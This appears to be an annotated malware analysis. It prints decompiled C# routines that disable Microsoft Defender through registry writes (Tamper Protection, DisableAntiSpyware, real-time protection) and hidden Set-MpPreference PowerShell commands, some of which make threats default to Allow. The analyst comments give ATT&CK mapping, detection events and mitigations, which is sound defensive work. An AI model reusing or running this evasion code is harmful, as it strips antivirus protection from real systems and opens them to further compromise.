// Token: 0x0600003A RID: 58
// Decompiled routine that tries to switch off Microsoft Defender through registry values
// and then hands over to GetMSEPrefUser(). Every action sits behind an administrator check,
// so a non-elevated run performs none of these calls.
//
// Analyst notes:
//  - Behaviour maps to MITRE ATT&CK T1562.001 (Impair Defenses: Disable or Modify Tools).
//  - PushRegistryKey is not shown here; the hive, the value type and whether missing keys are
//    created cannot be confirmed from this listing. The paths look relative to HKLM - verify
//    against the helper.
//  - Detection: alert on writes to the key/value pairs listed below by anything other than
//    Group Policy or MDM tooling (registry auditing, Sysmon registry events), and on Defender
//    operational event 5007 (configuration changed).
//  - Mitigation: with Tamper Protection enabled, Defender is documented to block or ignore
//    changes to these settings; current platform versions are also documented to ignore
//    DisableAntiSpyware on client SKUs. Confirm for the fleet in question.
//  - The misspelled class name "ModifRegitry" recurs in this sample and may serve as a
//    hunting string for related builds.
public static void SetRegistryKey()
{
    // Privilege gate: proceed only if the current Windows identity is in the built-in Administrators role.
    if (new WindowsPrincipal(WindowsIdentity.GetCurrent()).IsInRole(WindowsBuiltInRole.Administrator))
    {
        // Attempts to clear the Tamper Protection feature value.
        ModifRegitry.PushRegistryKey("SOFTWARE\\Microsoft\\Windows Defender\\Features", "TamperProtection", "0");
        // Policy value that historically turned Defender antivirus off as a whole.
        ModifRegitry.PushRegistryKey("SOFTWARE\\Policies\\Microsoft\\Windows Defender", "DisableAntiSpyware", "1");
        // Real-time protection policy values: behaviour monitoring, on-access scanning,
        // and the scan that runs when real-time protection is turned on.
        ModifRegitry.PushRegistryKey("SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection", "DisableBehaviorMonitoring", "1");
        ModifRegitry.PushRegistryKey("SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection", "DisableOnAccessProtection", "1");
        ModifRegitry.PushRegistryKey("SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection", "DisableScanOnRealtimeEnable", "1");
        // Second stage: query the live Defender preferences and change them via PowerShell.
        ModifRegitry.GetMSEPrefUser();
    }
}
// Token: 0x0600003C RID: 60
// Decompiled routine that reads the current Defender preferences and, for each setting still
// in a protective state, calls Loadpowershell with a Set-MpPreference command that weakens it.
//
// Flow visible in this listing:
//  1. Starts "powershell" with "Get-MpPreference -verbose", stdout redirected, no window.
//  2. Reads the output line by line; each line is matched on its prefix (setting name) and
//     its suffix (current value).
//  3. On a match, passes a fixed Set-MpPreference command string to Loadpowershell.
//     Loadpowershell is not shown; presumably it runs the string in PowerShell - confirm.
//
// Analyst notes:
//  - The if/else-if chain issues at most one command per output line, and only when the
//    current value differs from the target, so the number of child processes reflects how
//    the host was configured beforehand.
//  - Target values, per the Defender cmdlet documentation: threat default action 6 = Allow,
//    MAPSReporting 0 = cloud reporting disabled, SubmitSamplesConsent 2 = never send samples.
//  - Detection: process-creation telemetry (Security 4688 with command line, Sysmon event 1)
//    for powershell whose arguments contain Get-MpPreference or Set-MpPreference from a
//    non-administrative parent; PowerShell script block logging (event 4104); Defender
//    operational events 5007 (configuration changed) and 5001 (real-time protection disabled).
//  - Mitigation: Tamper Protection is documented to block several of these changes,
//    including -DisableRealtimeMonitoring; verify coverage for the remaining switches.
//  - "powershell" is given without a path, so resolution depends on the process search order.
//  - The Process object is neither waited on nor disposed in this method.
private static void GetMSEPrefUser()
{
    // Hidden, non-shell-execute PowerShell child whose standard output is captured by this process.
    Process process = new Process { StartInfo = new ProcessStartInfo { FileName = "powershell", Arguments = "Get-MpPreference -verbose", UseShellExecute = false, RedirectStandardOutput = true, WindowStyle = ProcessWindowStyle.Hidden, CreateNoWindow = true } };
    process.Start();
    // Parse the preference listing one line at a time until the child closes stdout.
    while (!process.StandardOutput.EndOfStream)
    {
        string text = process.StandardOutput.ReadLine();
        // Boolean "Disable*" settings: a current value of False means the protection is still on.
        if (text.StartsWith("DisableRealtimeMonitoring") && text.EndsWith("False"))
        {
            ModifRegitry.Loadpowershell("Set-MpPreference -DisableRealtimeMonitoring $true");
        }
        else if (text.StartsWith("DisableBehaviorMonitoring") && text.EndsWith("False"))
        {
            ModifRegitry.Loadpowershell("Set-MpPreference -DisableBehaviorMonitoring $true");
        }
        else if (text.StartsWith("DisableBlockAtFirstSeen") && text.EndsWith("False"))
        {
            ModifRegitry.Loadpowershell("Set-MpPreference -DisableBlockAtFirstSeen $true");
        }
        else if (text.StartsWith("DisableIOAVProtection") && text.EndsWith("False"))
        {
            ModifRegitry.Loadpowershell("Set-MpPreference -DisableIOAVProtection $true");
        }
        else if (text.StartsWith("DisablePrivacyMode") && text.EndsWith("False"))
        {
            ModifRegitry.Loadpowershell("Set-MpPreference -DisablePrivacyMode $true");
        }
        else if (text.StartsWith("SignatureDisableUpdateOnStartupWithoutEngine") && text.EndsWith("False"))
        {
            ModifRegitry.Loadpowershell("Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true");
        }
        else if (text.StartsWith("DisableArchiveScanning") && text.EndsWith("False"))
        {
            ModifRegitry.Loadpowershell("Set-MpPreference -DisableArchiveScanning $true");
        }
        else if (text.StartsWith("DisableIntrusionPreventionSystem") && text.EndsWith("False"))
        {
            ModifRegitry.Loadpowershell("Set-MpPreference -DisableIntrusionPreventionSystem $true");
        }
        else if (text.StartsWith("DisableScriptScanning") && text.EndsWith("False"))
        {
            ModifRegitry.Loadpowershell("Set-MpPreference -DisableScriptScanning $true");
        }
        // Cloud telemetry settings: acted on when the value is not already the target.
        else if (text.StartsWith("SubmitSamplesConsent") && 
!text.EndsWith("2"))
        {
            ModifRegitry.Loadpowershell("Set-MpPreference -SubmitSamplesConsent 2");
        }
        else if (text.StartsWith("MAPSReporting") && !text.EndsWith("0"))
        {
            ModifRegitry.Loadpowershell("Set-MpPreference -MAPSReporting 0");
        }
        // Default remediation action per threat severity: each is set to 6 unless it already ends in 6.
        else if (text.StartsWith("HighThreatDefaultAction") && !text.EndsWith("6"))
        {
            ModifRegitry.Loadpowershell("Set-MpPreference -HighThreatDefaultAction 6 -Force");
        }
        else if (text.StartsWith("ModerateThreatDefaultAction") && !text.EndsWith("6"))
        {
            ModifRegitry.Loadpowershell("Set-MpPreference -ModerateThreatDefaultAction 6");
        }
        else if (text.StartsWith("LowThreatDefaultAction") && !text.EndsWith("6"))
        {
            ModifRegitry.Loadpowershell("Set-MpPreference -LowThreatDefaultAction 6");
        }
        else if (text.StartsWith("SevereThreatDefaultAction") && !text.EndsWith("6"))
        {
            ModifRegitry.Loadpowershell("Set-MpPreference -SevereThreatDefaultAction 6");
        }
    }
}